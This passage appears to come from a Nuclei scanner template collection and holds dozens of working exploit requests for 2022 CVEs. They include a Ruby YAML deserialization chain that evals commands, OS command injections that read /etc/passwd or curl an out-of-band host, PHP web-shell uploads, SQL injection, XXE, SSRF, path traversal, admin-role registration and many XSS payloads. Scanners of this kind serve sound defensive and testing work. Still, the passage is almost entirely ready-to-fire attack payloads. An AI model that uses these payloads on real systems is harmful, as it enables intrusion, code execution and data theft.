requirements:\\n    !ruby/object:Gem::Package::TarReader\\n    io: &1 !ruby/object:Net::BufferedIO\\n      io: &1 !ruby/object:Gem::Package::TarReader::Entry\\n         read: 0\\n         header: \\\"pew\\\"\\n      debug_output: &1 !ruby/object:Net::WriteAdapter\\n         socket: &1 !ruby/object:PrettyPrint\\n             output: !ruby/object:Net::WriteAdapter\\n                 socket: &1 !ruby/module \\\"Kernel\\\"\\n                 method_id: :eval\\n             newline: \\\"throw `id`\\\"\\n             buffer: {}\\n             group_stack:\\n              - !ruby/object:PrettyPrint::Group\\n                break: true\\n         method_id: :breakable\\n\", \"package_name\": \"{{rand_base(4)}}\", \"package_note\": \"{{randstr}}\", \"original_sender_name\": \"{{randstr}}\", \"package_uuid\": \"d7cb6601-6db9-43aa-8e6b-dfb4768647ec\", \"metadata_human_readable\": \"Yes\", \"forward\": \"pew\", \"metadata_json\": \"{}\", \"delivery_uuid\": \"d7cb6601-6db9-43aa-8e6b-dfb4768647ec\", \"delivery_sender_name\": \"{{rand_base(8)}}\", \"delivery_title\": \"{{rand_base(4)}}\", \"delivery_note\": \"{{rand_base(4)}}\", \"delete_after_download\": true, \"delete_after_download_condition\": \"IDK\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-23808","info":{"name":"phpMyAdmin < 5.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/phpmyadmin/setup/index.php?page=servers&mode=test&id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/setup/index.php?page=servers&mode=test&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>","<h2>Add a new server</h2>","<title>phpMyAdmin setup"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31126","info":{"name":"Roxy-WI <6.1.1.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /app/options.py HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/app/login.py\n\nalert_consumer=1&serv=127.0.0.1&ipbackend=\";cat+/etc/passwd+##&backend_server=127.0.0.1\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29299","info":{"name":"SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><\"\">","/Solar_History.php\" METHOD=\"post\">"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1574","info":{"name":"WordPress HTML2WP <=1.0.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 253\nContent-Type: multipart/form-data; boundary=---------------------------7816508136577551742878603990\nConnection: close\n\n-----------------------------7816508136577551742878603990\nContent-Disposition: form-data; name=\"local_importing[]\"; filename=\"{{randstr}}.php\"\nContent-Type: text/html\n\n<?php\n\necho \"File Upload success\";\n\n-----------------------------7816508136577551742878603990--\n","GET /wp-content/uploads/html2wp/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 302","status_code_2 == 200","contains(body_2, 'File Upload success')"],"condition":"and"}]}]},{"id":"CVE-2022-24129","info":{"name":"Shibboleth OIDC OP <3.0.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["ShibbolethIdp"]}]}]},{"id":"CVE-2022-45933","info":{"name":"KubeView <=0.1.31 - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/scrape/kube-system"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BEGIN CERTIFICATE","END CERTIFICATE","kubernetes.io"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46381","info":{"name":"Linear eMerge E3-Series - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/badging/badge_template_v0.php?layout=1&type=\"/><svg/onload=\"alert(document.domain)\"/>"],"matchers-condition":"and","matchers":[{"type":"word","words":["<svg/onload=\"alert(document.domain)\"/>","Badging Template"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1597","info":{"name":"WordPress WPQA <5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0\nContent-Type: application/x-www-form-urlencoded\n\nuser_name={{user}}&email={{user}}@{{Host}}&pass1={{pass}}&pass2={{pass}}&phone={{rand_text_numeric(10)}}&agree_terms=on&form_type=wpqa-signup&action=wpqa_ajax_signup_process\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0\nContent-Type: application/x-www-form-urlencoded\n\nuser_mail={{user}}@{{Host}}&form_type=wpqa_forget&action=wpqa_ajax_password_process&redirect_to={{url_encode(redirect_to)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{redirect_to}}","\"success\":1"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29005","info":{"name":"Online Birth Certificate System 1.2 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /obcs/user/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nmobno={{username}}&password={{password}}&login=\n","POST /obcs/user/profile.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nfname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&lname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&add=New+Delhi+India+110001&submit=\n","GET /obcs/user/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, 'admin-name\\\">{{str}}<script>alert(document.domain);</script>')"],"condition":"and"}]}]},{"id":"CVE-2022-2376","info":{"name":"WordPress Directorist <7.3.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=directorist_author_pagination"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["directorist-authors__card__details__top","directorist-authors__card__info-list"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4328","info":{"name":"WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name={{randstr}}.pHp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------22728be7b3104597\n\n--------------------------22728be7b3104597\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5(\"CVE-2022-4328\"); ?>\n\n--------------------------22728be7b3104597--\n","GET /wp-content/uploads/cfom_files/{{to_lower('{{randstr}}')}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["fe5df26ce4ca0056ffae8854469c282f"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-36804","info":{"name":"Atlassian Bitbucket - Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /rest/api/latest/repos HTTP/1.1\nHost: {{Hostname}}\n","GET /rest/api/latest/projects/{{key}}/repos/{{slug}}/archive?filename={{data}}&at={{data}}&path={{data}}&prefix=ax%00--exec=%60id%60%00--remote=origin HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"iterate-all":true,"matchers-condition":"and","matchers":[{"type":"word","words":["com.atlassian.bitbucket.scm.CommandFailedException"]},{"type":"status","status":[500]}],"extractors":[{"type":"json","name":"key","internal":true,"json":[".[\"values\"] | .[] | .[\"project\"] | .key"],"part":"body"},{"type":"json","name":"slug","internal":true,"json":[".[\"values\"] | .[]  | .slug"],"part":"body"},{"type":"regex","group":1,"regex":["uid=.*\\(([a-z]+)\\):"]}]}]},{"id":"CVE-2022-37190","info":{"name":"Cuppa CMS v1.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_api_keys\n","POST /api/index.php HTTP/1.1\nHost: {{Hostname}}\nkey: {{apikey}}\nContent-Type: application/x-www-form-urlencoded\n\naction=system&function=exec&cmd=cat+/etc/passwd\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header_3","words":["text/html"]},{"type":"regex","regex":["postgres:.*:1001:","root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"apikey","group":1,"regex":["<td class='td_key'>(.*?)</td>"],"internal":true}]}]},{"id":"CVE-2022-1933","info":{"name":"WordPress CDI <5.1.9 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cdi_collect_follow&trk=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Tracking code not correct"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38817","info":{"name":"Dapr Dashboard 0.1.0-0.10.0 - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/statestore","{{BaseURL}}/overview","{{BaseURL}}/controlplane"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Dapr Dashboard</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0422","info":{"name":"WordPress White Label CMS <2.2.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php?wlcms-action=preview HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nwlcms%5B_login_custom_js%5D=alert%28%2FXSS%2F%29%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert(/XSS/);"]},{"type":"word","part":"body","words":["wlcms-login-wrapper"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31373","info":{"name":"SolarView Compact 6.00 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_AiConf.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/Solar_AiConf.php/\"><script>alert(document.domain)</script>","HREF=\"Solar_Service.php\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0441","info":{"name":"MasterStudy LMS <2.7.6 - Improper Access Control","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"user_login\":\"{{username}}\",\"user_email\":\"{{user_email}}\",\"user_password\":\"{{password}}\",\"user_password_re\":\"{{password}}\",\"become_instructor\":\"\",\"privacy_policy\":true,\"degree\":\"\",\"expertize\":\"\",\"auditory\":\"\",\"additional\":[],\"additional_instructors\":[],\"profile_default_fields_for_register\":{\"wp_capabilities\":{\"value\":{\"administrator\":1}}}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Registration completed successfully","\"status\":\"success\""],"condition":"and"},{"type":"word","part":"header_2","words":["application/json;"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"stm_lms_register\":\"([0-9a-z]+)\""],"internal":true},{"type":"kval","kval":["user_email","password"]}]}]},{"id":"CVE-2022-29548","info":{"name":"WSO2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CARBON.showWarningDialog('???');alert(document.domain)//???"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1952","info":{"name":"WordPress eaSYNC Booking <1.1.16 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID=a0d5959357e474aef655313f69891f37\nContent-Type: multipart/form-data; boundary=------------------------98efee55508c5059\n\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"action\"\n\neasync_session_store\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"type\"\n\ncar\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"with_driver\"\n\nself-driven\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"driver_license_image2\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5('CVE-2022-1952');?>\n\n--------------------------98efee55508c5059--\n","GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID=a0d5959357e474aef655313f69891f37\n","GET /wp-content/uploads/{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_1, 'success\\\":true')","contains(body_3, 'e0d7fcf2c9f63143b6278a3e40f6bea9')"],"condition":"and"}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["wp-content\\\\\\/uploads\\\\\\/([0-9a-zA-Z]+).php"],"internal":true}]}]},{"id":"CVE-2022-0220","info":{"name":"WordPress GDPR & CCPA <1.9.27 -  Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=check_privacy_settings&settings%5B40%5D=40&settings%5B41%5D=%3cbody%20onload%3dalert(document.domain)%3e&nonce={{nonce}}\n"],"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(header_2, 'text/html')","status_code_2 == 200","contains(body_2, '<body onload=alert(document.domain)>') && contains(body_2, '/wp-content/plugins/')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["nonce\":\"([0-9a-z]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-43185","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=holidays/holidays&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_date=2023-05-22&end_date=2023-05-31\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-32026","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /admin/manage_booking.php?id=-1%20union%20select%201,2,3,4,5,6,md5({{num}}),8,9,10,11--+ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"skip-variables-check":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1756","info":{"name":"Newsletter < 7.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=newsletter_main_index&debug&\"><svg/onload=alert(/document.domain/)> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"newsletter\") && contains(body, \"><svg/onload=alert(/document.domain/)>\")"],"condition":"and"}]}]},{"id":"CVE-2022-0928","info":{"name":"Microweber < 1.2.12 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /api/shop/save_tax_item HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:settings\n\nid=0&name=vat1&type=\"><img+src%3dx+onerror%3dalert(document.domain)>&rate=10\n","POST /module HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer:{{BaseURL}}/admin/view:settings\n\nclass=+module+module-shop-taxes-admin-list-taxes+&id=mw_admin_shop_taxes_items_list&parent-module-id=settings-admin-mw-main-module-backend-shop-taxes-admin&parent-module=shop%2Ftaxes%2Fadmin&data-type=shop%2Ftaxes%2Fadmin_list_taxes\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_3,\"<img src=x onerror=alert(document.domain)></td>\")","contains(header_3,\"text/html\")","status_code_2 == 200 && status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-28363","info":{"name":"Reprise License Manager 14.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","Login Failed"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0271","info":{"name":"LearnPress <4.1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"dismissed\":\"xxx<img src=x onerror=alert(document.domain)>\"}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3980","info":{"name":"Sophos Mobile managed on-premises - XML External Entity Injection","severity":"critical"},"requests":[{"raw":["@timeout: 50s\nPOST /servlets/OmaDsServlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: \"application/xml\"\n\n<?xml version=\"1.0\"?>\n<!DOCTYPE cdl [<!ENTITY % test SYSTEM \"http://{{interactsh-url}}\">%test;]>\n<cdl>test</cdl>\n"],"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')","status_code == 400","len(body) == 0"],"condition":"and"}]}]},{"id":"CVE-2022-4301","info":{"name":"WordPress Sunshine Photo Cart <2.9.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-login.php?action=register&redirect_to=x%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Registration Form"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28022","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Master.php?f=delete_item HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nid=test'+AND+(SELECT+2844+FROM+(SELECT(SLEEP(6)))FDTM)+AND+'sWZA'='sWZA\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"status\\\":\\\"success\")"],"condition":"and"}]}]},{"id":"CVE-2022-23854","info":{"name":"AVEVA InTouch Access Anywhere Secure Gateway - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["for 16-bit app support","extensions"],"condition":"and"},{"type":"word","part":"header","words":["text/ini","application/octet-stream"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23544","info":{"name":"MeterSphere < 2.5.0 SSRF","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/resource/md/get/url?url=http://oast.pro"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31474","info":{"name":"BackupBuddy - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32772","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["avideoAlertInfo(\"</script><script>alert(document.cookie);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2219","info":{"name":"Unyson < 2.7.27 - Cross Site Scripting","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=fw-extensions&sub-page=extension&extension=feedback<script>alert(document.domain)</script>  HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"script%3Ealert%28document.domain%29%3C%2Fscript%3\")","contains(body_2, \"Unyson\")"],"condition":"and"}]}]},{"id":"CVE-2022-0208","info":{"name":"WordPress Plugin MapPress <2.73.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>","Bad mapid"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3933","info":{"name":"WordPress Essential Real Estate <3.9.6 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=ere_property_gallery_fillter_ajax&columns_gap=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C!-- HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"><script>alert(document.domain)</script>\")","contains(body_2, \"ere_property_gallery\")"],"condition":"and"}]}]},{"id":"CVE-2022-25323","info":{"name":"ZEROF Web Server 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin.back<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["back<img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2022-43166","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&group_id=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-30525","info":{"name":"Zyxel Firewall - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /ztp/cgi-bin/handler HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"command\":\"setWanPortSt\",\"proto\":\"dhcp\",\"port\":\"4\",\"vlan_tagged\":\"1\",\"vlanid\":\"5\",\"mtu\":\"; curl {{interactsh-url}};\",\"data\":\"hi\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-2633","info":{"name":"All-In-One Video Gallery <=2.6.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /index.php/video/?dl={{base64('https://oast.me/')}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29301","info":{"name":"SolarView Compact 6.00 - 'pow' Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&bgcolor=green"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><\"\">","SolarView"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35914","info":{"name":"GLPI <=10.0.2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: 